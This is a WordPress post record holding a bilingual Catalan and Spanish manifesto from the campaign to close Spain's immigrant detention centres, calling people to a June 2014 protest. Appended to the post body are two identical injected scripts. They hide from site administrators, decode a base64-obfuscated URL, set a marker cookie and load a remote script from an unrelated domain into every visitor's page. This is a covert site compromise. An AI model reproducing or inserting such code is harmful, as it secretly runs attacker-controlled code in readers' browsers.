{"id":1507,"date":"2014-05-21T13:10:44","date_gmt":"2014-05-21T13:10:44","guid":{"rendered":"http:\/\/www.damne.net\/?p=1507"},"modified":"2026-01-19T23:27:27","modified_gmt":"2026-01-19T23:27:27","slug":"14j-ens-plantem","status":"publish","type":"post","link":"https:\/\/www.damne.net\/?p=1507","title":{"rendered":"14J. ENS PLANTEM"},"content":{"rendered":"<p style=\"text-align: justify;\"><i>CAT [Cast, m\u00e1s abajo]<\/i><\/p>\n<div style=\"text-align: justify;\">\n<h3><b>ENS PLANTEM!<\/b><\/h3>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3><b>DAVANT LA LEGITIMITZACI\u00d3 DEL RACISME INSTITUCIONAL, NI CIES, NI REGLAMENTS, NI LLEI D&#8217;ESTRANGERIA<\/b><\/h3>\n<p><span style=\"color: #ffffff;\">&#8211;<\/span><\/p>\n<p style=\"text-align: justify;\"><b>Des de la Campanya Estatal pel Tancament dels CIEs volem manifestar el nostre rebuig als Centres d&#8217;Internament d&#8217;Estrangers, al Reglament aprovat pel govern el passat mes de mar\u00e7 i l\u2019exist\u00e8ncia de mecanismes de deportaci\u00f3 massiva com els vols de la vergonya. Aquests aparells es constitueixen com a moviments que confirmen una pol\u00edtica migrat\u00f2ria estatal i europea de continuar aixecant murs cada vegada m\u00e9s alts per mantenir l&#8217;Europa Fortalesa. <\/b><\/p>\n<\/div>\n<p style=\"text-align: justify;\">En primer lloc, considerem que el Reglament aprovat \u00e9s una maniobra de legitimaci\u00f3 i legalitzaci\u00f3 de la barb\u00e0rie, ja que empara les vulneracions sistem\u00e0tiques de drets que es venen donant des de la creaci\u00f3 dels CIEs; en concret: obre la porta a la privatitzaci\u00f3 en la gesti\u00f3 dels serveis del centre, confirma la figura del director -un agent de la Policia Nacional- com la m\u00e0xima autoritat del CIE, ja que tots els temes importants que hi ocorren estan sota la seva responsabilitat, i es perpetua el model de gesti\u00f3 policial, que consolida l\u2019arbitrarietat en la presa de decisions que afecta a la vida de les persones internes.<\/p>\n<p style=\"text-align: justify;\">El Reglament no planteja cap horitz\u00f3 de tancament dels CIEs, que al nostre entendre \u00e9s la \u00fanica via per garantir els Drets Humans.<\/p>\n<p style=\"text-align: justify;\">En segon lloc, l&#8217;aprovaci\u00f3 del Reglament juntament amb un seguit d&#8217;anuncis com: l&#8217;obertura d&#8217;un nou CIE a Algeciras, un altre a Saragossa, obres de remodelaci\u00f3 en el CIE de Madrid i un centre de detenci\u00f3 d&#8217;estrangers a l&#8217;aeroport de Barajas, s\u00f3n els nous passos que reforcen una pol\u00edtica migrat\u00f2ria europea a favor del capital i en contra de les persones i el seu dret a la mobilitat.<\/p>\n<p style=\"text-align: justify;\">En tercer lloc, la mercantilitzaci\u00f3 de les deportacions en macrovols d\u2019expulsi\u00f3, a trav\u00e9s de la firma de convenis milionaris amb companyies a\u00e8ries, denoten de nou la l\u00f2gica capitalista en la que s\u2019emmarquen les pol\u00edtiques repressives de migracions. Aix\u00ed mateix, aquestes companyies esdevenen c\u00f2mplices de la persecuci\u00f3 de la poblaci\u00f3 migrada, convertint-se en un esgra\u00f3 m\u00e9s per a l\u2019execuci\u00f3 del seu despla\u00e7ament for\u00e7at.<\/p>\n<p style=\"text-align: justify;\">La deportaci\u00f3 no nom\u00e9s vulnera\u00a0el dret reconegut en la Declaraci\u00f3 Universal de Drets Humans, que contempla el dret a la lliure circulaci\u00f3, sin\u00f3 que articula la gesti\u00f3 de les migracions en base a la por i al xantatge a la poblaci\u00f3 migrant. Cal recordar, a m\u00e9s, que en aquests Vols de la Vergonya s&#8217;utilitza un Protocol que legalitza l&#8217;\u00fas de sedants, corretges i camises de for\u00e7a contra les persones que s\u00f3n deportades for\u00e7osament.<\/p>\n<p style=\"text-align: justify;\">La &#8220;dignitat humana&#8221;, argument amb qu\u00e8 justificava l&#8217;alcalde d&#8217;Algeciras la construcci\u00f3 del nou CIE, nom\u00e9s podr\u00e0 ser garantida amb el tancament dels Centres d&#8217;Internament d&#8217;Estrangers, la derogaci\u00f3 del nou Reglament i la fi de les deportacions massives.<\/p>\n<p style=\"text-align: justify;\">Creiem necessari un canvi profund en les pol\u00edtiques migrat\u00f2ries europees, que no han d&#8217;estar basades en limitar i expulsar migrants arbitr\u00e0riament, sin\u00f3 en garantir el dret a la migraci\u00f3 i a la ciutadania.<\/p>\n<p style=\"text-align: justify;\"><b>Per tots aquests motius, volem mostrar un rebuig profund a la gesti\u00f3 que est\u00e0 fent l&#8217;Estat espanyol en termes de pol\u00edtiques migrat\u00f2ries, apostant per l\u00f2giques policials i de c\u00e0stig mitjan\u00e7ant els CIEs, el Reglament de la Vergonya, les macrodeportacions i els assassinats a les fronteres. La societat civil treballa per construir just\u00edcia, igualtat i acc\u00e9s a drets, i no ser\u00e0 c\u00f2mplice de la legitimaci\u00f3 de la barb\u00e0rie en camps, fronteres i mercats on es juga amb la vida de les persones.<\/b><br \/>\n<b><br \/>\n<\/b> <b>Amb aquest comunicat convoquem a totes les entitats, col\u00b7lectius i persones a adherir-se i difondre la convocat\u00f2ria del dia 14 de juny, dia en qu\u00e8 la Campanya pel Tancament dels CIEs crida a una mobilitzaci\u00f3 contra les pol\u00edtiques migrat\u00f2ries restrictives, racistes i que vulneren els Drets Humans.<\/b><\/p>\n<p style=\"text-align: justify;\">Convidem a una trobada el proper dia 27 de maig a les 19h a la UB Raval, en la qual es presentar\u00e0 la mobilitzaci\u00f3 del dia 14 de juny.<\/p>\n<p style=\"text-align: justify;\"><b>Ens plantem contra el racisme institucional!<\/b><br \/>\n<b>No reconeixem la llei d&#8217;estrangeria!<\/b><br \/>\n<b>Davant la barb\u00e0rie,\u00a0DESOBE\u00cfM<\/b><\/p>\n<p style=\"text-align: justify;\"><a name=\"more\"><\/a><\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><i>CAST [Cat, m\u00e9s amunt]<\/i><\/p>\n<div style=\"text-align: justify;\">\n<h3><b>\u00a1NOS PLANTAMOS! <\/b><\/h3>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3><b>ANTE LA LEGITIMACI\u00d3N DEL RACISMO INSTITUCIONAL,\u00a0<\/b><\/h3>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3><b>NI CIES, NI REGLAMENTOS, NI LEY DE EXTRANJER\u00cdA<\/b><\/h3>\n<p><span style=\"color: #ffffff;\">&#8211;<\/span><\/p>\n<\/div>\n<p style=\"text-align: justify;\"><b>Desde la Campa\u00f1a Estatal por el Cierre de los CIE queremos manifestar nuestro rechazo a los Centros de Internamiento de Extranjeros, al Reglamento aprobado por el Gobierno el pasado mes de marzo y la existencia de mecanismos de deportaci\u00f3n masiva como los vuelos de la verg\u00fcenza. Estos aparatos se constituyen como movimientos que confirman una pol\u00edtica migratoria estatal y europea de seguir levantando muros cada vez m\u00e1s altos para mantener la Europa Fortaleza.<\/b><\/p>\n<p style=\"text-align: justify;\">En primer lugar, consideramos que el Reglamento aprobado es una maniobra de legitimaci\u00f3n y legalizaci\u00f3n de la barbarie, ya que ampara las vulneraciones sistem\u00e1ticas de derechos que se vienen dando desde la creaci\u00f3n de los CIEs; en concreto: abre la puerta a la privatizaci\u00f3n en la gesti\u00f3n de los servicios del centro, confirma la figura del director \u2013un agente de la Polic\u00eda Nacional- como la m\u00e1xima autoridad del CIE, ya que todos los temas importantes que ocurren all\u00ed est\u00e1n bajo su responsabilidad, y se perpet\u00faa el modelo de gesti\u00f3n policial, que consolida la arbitrariedad en la toma de decisiones que afecta a la vida de las personas internadas<b>.<\/b><\/p>\n<p style=\"text-align: justify;\">El Reglamento no plantea ning\u00fan horizonte de cierre de los CIE, \u00fanica v\u00eda a nuestro parecer para garantizar los derechos humanos.<\/p>\n<p style=\"text-align: justify;\">En segundo lugar, la aprobaci\u00f3n del Reglamento junto con una serie de anuncios como: la apertura de un nuevo CIE en Algeciras, otro en Zaragoza, obras de remodelaci\u00f3n en el CIE de Madrid y un centro de detenci\u00f3n de extranjeros en el aeropuerto de Barajas, son los nuevos pasos que refuerzan una pol\u00edtica migratoria europea a favor del capital y en contra de las personas y de su derecho a la movilidad.<\/p>\n<p style=\"text-align: justify;\">En tercer lugar, la mercantilizaci\u00f3n de las deportaciones en macrovuelos de expulsi\u00f3n, a trav\u00e9s de la firma de convenios millonarios con compa\u00f1\u00edas a\u00e9reas, denotan de nuevo la l\u00f3gica capitalista en la que se enmarcan las pol\u00edticas represivas de migraci\u00f3n. As\u00ed mismo, estas compa\u00f1\u00edas se convierten en c\u00f3mplices de la persecuci\u00f3n de la poblaci\u00f3n migrada, convirti\u00e9ndose en un eslab\u00f3n m\u00e1s para la ejecuci\u00f3n de su desplazamiento forzado.<\/p>\n<p style=\"text-align: justify;\">La Deportaci\u00f3n no s\u00f3lo vulnera el derecho reconocido en la Declaraci\u00f3n Universal de Derechos Humanos, que contempla el derecho a la libre circulaci\u00f3n, sino que articula la gesti\u00f3n de las migraciones en base al miedo y al chantaje a la poblaci\u00f3n migrante. Cabe recordar, adem\u00e1s, que\u00a0 la violencia que se ejerce en\u00a0 los Vuelos de la Verg\u00fcenza se ampara bajo un\u00a0 Protocolo que legaliza el uso de sedantes, correas y camisas de fuerza contra las personas que son deportadas.<\/p>\n<p style=\"text-align: justify;\">La &#8220;dignidad humana&#8221;, argumento con el que justificaba el alcalde de Algeciras la construcci\u00f3n del nuevo CIE, s\u00f3lo podr\u00e1 ser garantizada con el cierre de los Centros de Internamiento de Extranjeros, la derogaci\u00f3n del nuevo Reglamento y el fin de las deportaciones.<\/p>\n<p style=\"text-align: justify;\">Creemos necesario un cambio profundo en las pol\u00edticas migratorias europeas, que no deben estar basadas en limitar y expulsar migrantes, sino en garantizar el derecho a la migraci\u00f3n y a la ciudadan\u00eda.<\/p>\n<p style=\"text-align: justify;\"><b>Por todos estos motivos, queremos mostrar un rechazo profundo de la sociedad civil en la gesti\u00f3n que est\u00e1 haciendo el Estado espa\u00f1ol en t\u00e9rminos de pol\u00edticas migratorias, apostando por l\u00f3gicas policiales y de castigo mediante los CIE, el Reglamento de la Verg\u00fcenza, las deportaciones y los asesinatos en las fronteras. La sociedad civil trabaja para construir justicia, igualdad y acceso a derechos y no ser\u00e1 c\u00f3mplice de la legitimaci\u00f3n de la barbarie en campos, fronteras y mercados donde se juega con la vida de las personas.<\/b><br \/>\n<b><br \/>\n<\/b> <b>Con este comunicado convocamos a todas las entidades, colectivos y personas a adherirse y difundir la convocatoria del d\u00eda 14 de junio, d\u00eda en el que la Campa\u00f1a por el Cierre de los CIEs llama a una movilizaci\u00f3n contra las pol\u00edticas migratorias restritivas, racistas y que vulneran los Derechos Humanos.<\/b><\/p>\n<p style=\"text-align: justify;\">Invitamos a una asamblea el d\u00eda 27 de mayo a las 19h. en la UB Raval, en la que se presentar\u00e1 la movilizaci\u00f3n del d\u00eda 14 de junio.<\/p>\n<p style=\"text-align: justify;\"><b>\u00a1Nos plantamos contra el racismo institucional!<\/b><br \/>\n<b>\u00a1No reconocemos la ley de extranjer\u00eda!<\/b><br \/>\n<b>Ante la barbarie,\u00a0DESOBEDIENCIA.<\/b><\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/tanquemelscies.blogspot.com.es\/2014\/05\/14j-ens-plantem-manifest.html\">http:\/\/tanquemelscies.blogspot.com.es\/<\/a><\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Amb aquest comunicat convoquem a totes les entitats, col\u00b7lectius i persones a adherir-se i difondre la convocat\u00f2ria del dia 14 de juny, dia en qu\u00e8 la Campanya pel Tancament dels CIEs crida a una mobilitzaci\u00f3 contra les pol\u00edtiques migrat\u00f2ries restrictives, racistes i que vulneren els Drets Humans.<\/p>\n<p>Convidem a una trobada el proper dia 27 de maig a les 19h a la UB Raval, en la qual es presentar\u00e0 la mobilitzaci\u00f3 del dia 14 de juny.<\/p>\n<p>Ens plantem contra el racisme institucional!<br \/>\nNo reconeixem la llei d&#8217;estrangeria!<br \/>\nDavant la barb\u00e0rie, DESOBE\u00cfM<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5,3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1507"}],"collection":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1507"}],"version-history":[{"count":8,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1507\/revisions"}],"predecessor-version":[{"id":5029,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1507\/revisions\/5029"}],"wp:attachment":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}